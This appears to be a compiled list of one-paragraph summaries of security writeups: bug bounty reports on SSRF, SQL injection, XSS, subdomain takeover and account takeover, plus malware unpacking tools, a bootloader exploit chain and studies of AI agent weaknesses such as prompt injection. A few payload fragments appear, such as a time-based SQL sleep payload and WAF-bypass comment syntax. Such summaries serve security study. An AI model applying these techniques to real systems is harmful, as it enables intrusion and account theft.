A researcher discovered an SSRF vulnerability in Vimeo's file upload function by exploiting partial content transfer using HTTP Range headers. By manipulating redirect responses during the chunked file download process, they were able to retrieve sensitive Google Cloud metadata and API tokens.

Technical writeup on exploiting SQL injection in INSERT/UPDATE queries when commas are forbidden by application logic, using CASE WHEN statements with LIKE operators and CAST functions to perform time-based blind SQL injection without comma delimiters. Includes working payload and automated Python exploit script.

Security researchers discovered an SSRF vulnerability on Airbnb's chat endpoint by chaining a third-party open redirect in LivePerson's API with path traversal via encoded backslashes, enabling arbitrary requests from the Airbnb server. The attack exploited LivePerson's visitorWantsToChat redirect parameter and path parameter traversal to bypass intended API boundaries.

A detailed writeup of a multi-stage attack chain exploiting WAF bypass via DNS enumeration to discover origin server IP, leveraging LFI to bypass Cloudflare, then escalating to SSRF by bypassing Nginx web cache (using query string manipulation), and finally extracting AWS credentials from instance metadata. The attacker discovered that Nginx cache rules didn't account for query parameters, allowing cache bypass via appending '?' to metadata API calls.

Researcher discovered a critical DoS vulnerability in GitHub Actions by exploiting git commit hash collisions—abbreviated 7-character shorthashes can be maliciously collided with, causing tarball resolution failures that break all builds using that action. The researcher accidentally triggered a global outage while demonstrating the attack.

Technical writeup demonstrating how to identify and exploit 55,000+ subdomain takeover vulnerabilities on Shopify by analyzing CNAME records pointing to Shopify's infrastructure, including two exploitation methods (application name mapping and DNS mapping) with step-by-step methodology and large-scale scanning techniques.

Researcher demonstrates escalation of a subdomain takeover on impact.postmates.com (GitHub pages vulnerability) into session cookie theft by leveraging document.domain relaxation in the parent domain postmates.com, enabling account takeover despite the subdomain being out-of-scope. The technique exploits the fact that if the main domain explicitly sets document.domain, a compromised subdomain can set it to match and access sensitive cookies via JavaScript.

A researcher discovered a chained CSRF vulnerability chain (4 requests) in a user management system's CSV import functionality that allowed unauthenticated account takeover by uploading a malicious CSV file without CSRF tokens, escalating to system admin privileges. The attack exploited timing delays between import steps and lack of CSRF protection on all four endpoints (file upload, job view, verification, and submission).

Steam Inventory Helper Chrome extension v1.13.6 suffered from a DOM-based XSS in bookmarks.html combined with clickjacking via over-permissive web_accessible_resources, allowing arbitrary JavaScript execution in the extension's privileged context and hijacking of all authenticated websites. The vulnerability exploits jQuery's unsafe DOM manipulation APIs (html/append) paired with unsafe-eval CSP directive, weaponized through UI redressing to trick users into pasting XSS payloads.

XSS vulnerability in a conference application (likely Zoom or similar) that chains to RCE via Node.js process execution in the native OS X client. The exploit uses String.fromCharCode to bypass quote filtering and jQuery's $.getScript() to fetch and execute remote code that spawns arbitrary processes.

PortSwigger researchers discovered a practical XSS exploitation technique for hidden input fields using the accesskey attribute combined with onclick events, which works across modern browsers including Firefox and Chrome by triggering payload execution via keyboard shortcuts (ALT+SHIFT+X on Windows, CTRL+ALT+X on macOS).

XSS vulnerability in dynamically generated PDF endpoint where unsanitized user input (utrnumber parameter) is rendered as HTML/JavaScript in PDFs, allowing arbitrary JavaScript execution under file:// origin and enabling local file read via XMLHttpRequest to access /etc/passwd.

Multiple DOM-based XSS vulnerabilities discovered in iframe buster implementations from major ad tech vendors (Adform, Eyeblaster, Adtech) due to weak regex and whitelist validation on user-controlled parameters, allowing attackers to inject arbitrary JavaScript on top-tier publisher sites.

A company was compromised by chaining an IDOR vulnerability in a support ticket API with a blind XSS vulnerability in the internal ticket management system. The attacker leveraged blind XSS to extract ticket IDs (which were otherwise hard to brute-force), then used IDOR to access a password reset ticket from Slack that contained registration links to company channels.

A stored XSS vulnerability in webcomponents.org allowed attackers to inject malicious JavaScript via repository homepage URLs, enabling theft of GitHub OAuth authorization codes and account hijacking to star repositories on behalf of authenticated users.

An XSS vulnerability in Google Code-in exploited improper escaping of user input within JSON data embedded in script tags, where the </script> sequence in user comments terminated the script element prematurely, allowing payload execution. The vulnerability was further exploited via AngularJS template injection ({{1-1}}) to bypass the Content Security Policy.

A creative XSS exploitation technique that transforms a reflected/stored XSS vulnerability in Swisscom's Bluewin webmail into a self-propagating worm via malicious attachment filenames. The worm leverages unescaped angle brackets in attachment metadata to inject JavaScript that can automatically enumerate and send itself to other users' contacts.

Jonathan Bouman discovered a persistent XSS vulnerability in LinkedIn's article embed feature by exploiting unvalidated Open Graph tags, specifically the og:video tag, to inject malicious HTML and create fake phishing login screens that could steal user credentials. The vulnerability leverages LinkedIn's content embedding functionality which processes Open Graph metadata without proper validation, allowing attackers to inject arbitrary content into iframes on LinkedIn articles.

A reflected XSS vulnerability on Amazon's masclient endpoint (/gp/masclient/dp/) allows attackers to inject arbitrary HTML/JavaScript by exploiting insufficient input validation and capitalization of product IDs. The author demonstrates cookie theft and session hijacking via SVG onload attributes with HTML entity encoding to bypass browser XSS protections.

A reflected XSS vulnerability was discovered on Philips.com through enabled Adobe Experience Manager debug mode in production, allowing HTML injection via the debug=layout parameter. The attack bypassed ModSecurity and Akamai WAF by using a <body onpointerenter> tag combined with jQuery.getScript() to load external JavaScript, enabling phishing and credential theft from authenticated users.

Unpacker is a modular malware packer detection and unpacking tool that automatically identifies packers (UPX, ASPack, Themida, VMProtect, MPRESS) via signatures, entropy, and heuristics, then dispatches to the appropriate unpacker module—native decompression for UPX, emulation-based unpacking via Unicorn/Qiling for others—with built-in validation using string analysis and file metadata.

A comprehensive guide to static malware analysis workflow covering triage, string analysis, PE import analysis, and unpacking, with open-source tools and an orchestrator for automation. The article explains each step's purpose and how to execute the full workflow programmatically.

A multi-stage Qualcomm GBL exploit chain allows bootloader unlocking on Snapdragon 8 Elite Gen 5 devices by leveraging an unsigned code execution vulnerability in the efisp partition, combined with a fastboot command injection flaw that disables SELinux enforcement, and OEM-specific vulnerabilities (Xiaomi's Hyper OS MQSAS service) to bypass strict bootloader unlock restrictions.

A 2-week empirical study of six autonomous AI agents with real tools (email, shell, persistent storage) tested by 20 researchers in both benign and adversarial scenarios, documenting 10 security vulnerabilities (prompt injection, identity spoofing, non-owner compliance, social engineering bypass) and 6 cases of emergent safety behavior including cross-agent safety coordination without explicit instruction.

Security researchers from Irregular found that LLM-generated passwords from Claude, ChatGPT, and Gemini are fundamentally weak due to predictable patterns, with entropy around 27-20 bits instead of the 98-120 bits expected from truly random passwords. This allows passwords to be brute-forced in hours rather than centuries, despite appearing strong to standard password checkers.

This article explores how dependent type systems in Lean 4 can serve as executable specifications, allowing AI-generated code to be verified as correct by the compiler rather than through traditional testing. The author demonstrates this with a worked example of AI-generated sorting implementations where the type signature itself encodes the correctness proof.

A researcher discovered an account takeover vulnerability in a login-with-OTP system by exploiting loose coupling between email and OTP validation. By changing the email parameter in the /login/signin POST request to a victim's email while using a valid OTP sent to the attacker's email, they could gain unauthorized access to any user account.

Technical writeup demonstrating SQL injection bypass of ModSecurity WAF using MySQL comment encoding (/*!50000*/) and alternative payload construction with MOD/DIV operators and variable assignment to extract WordPress database credentials and schema information.

A bug bounty hunter documents their journey discovering a time-based blind SQL injection vulnerability in a sorting parameter by using MySQL version detection via comment syntax to narrow payload scope, ultimately bypassing WAF filters with the payload (select*from(select(sleep(10)))a) and earning a $3500 bounty.

A bug bounty writeup demonstrating an account takeover vulnerability combining IDOR and weak encryption in a password reset function. The attacker decrypted Zlib-compressed tokens, discovered an Adler-32 checksum constraint, located a Transaction_Token endpoint via directory fuzzing, and automated exploitation to forge valid password reset links for arbitrary accounts.